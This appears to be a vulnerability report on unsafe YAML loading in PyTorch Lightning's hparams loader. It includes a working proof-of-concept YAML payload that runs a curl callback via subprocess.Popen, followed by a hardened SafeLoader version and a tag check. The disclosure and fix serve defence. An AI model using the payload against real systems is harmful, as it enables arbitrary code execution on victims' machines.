There is an untrusted YAML deserialization vulnerability in the PyTorchLightning GitHub repository. PyTorchLightning's saving.py (core.saving.load_hparams_from_yaml) loads the file with `yaml.UnsafeLoader` from the PyYAML library, which is not a safe loader: it resolves `!!python/...` tags to arbitrary Python objects and callables. Because of that, a maliciously crafted YAML config file can cause code execution on the victim's machine.
poc.py:

```python
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
```
evil.yaml:

```yaml
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
```
Start a listener to observe the callback, then run the PoC:

```shell
python3 -m http.server 8080
python3 poc.py
```
Maliciously crafted yaml config file can cause code execution on the victim’s machine.
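As an added defensive example (not code from this report or from PyTorch Lightning), the loader pattern the report describes is shown next to a hardened version that reads hparams with `yaml.SafeLoader`, which has no constructor for `!!python/...` tags and refuses them with `ConstructorError`. The sample YAML strings and the function names are constructed for this illustration.

```python
import yaml
from yaml.constructor import ConstructorError

# Constructed sample of an ordinary hparams file, the kind load_hparams_from_yaml reads.
BENIGN_HPARAMS = """\
learning_rate: 0.001
batch_size: 32
optimizer: adam
"""

# Constructed sample carrying a Python-specific tag. UnsafeLoader would resolve
# it to a callable; SafeLoader has no constructor for it and refuses the document.
TAGGED_HPARAMS = """\
learning_rate: 0.001
callback: !!python/object/apply:os.getcwd []
"""


def load_hparams_unsafe(text: str) -> dict:
    """The pattern the report describes: yaml.load with UnsafeLoader.
    Shown for contrast only; never use it on files you did not write."""
    return yaml.load(text, Loader=yaml.UnsafeLoader)


def load_hparams_safe(text: str) -> dict:
    """Hardened variant: SafeLoader builds only plain scalars, lists and maps,
    so any !!python/... tag raises ConstructorError instead of being executed."""
    return yaml.load(text, Loader=yaml.SafeLoader)


def is_safe_hparams(text: str) -> bool:
    """True when the document loads under SafeLoader; False when it would need
    Python-specific constructors, which is the event a defender wants to log."""
    try:
        load_hparams_safe(text)
    except ConstructorError:
        return False
    return True


if __name__ == "__main__":
    print(load_hparams_safe(BENIGN_HPARAMS))
    print("tagged file accepted by SafeLoader:", is_safe_hparams(TAGGED_HPARAMS))
```

The same change applies to a real `load_hparams_from_yaml`: swap `yaml.UnsafeLoader` for `yaml.SafeLoader` (or call `yaml.safe_load`) and treat a `ConstructorError` on a config file as a signal worth alerting on.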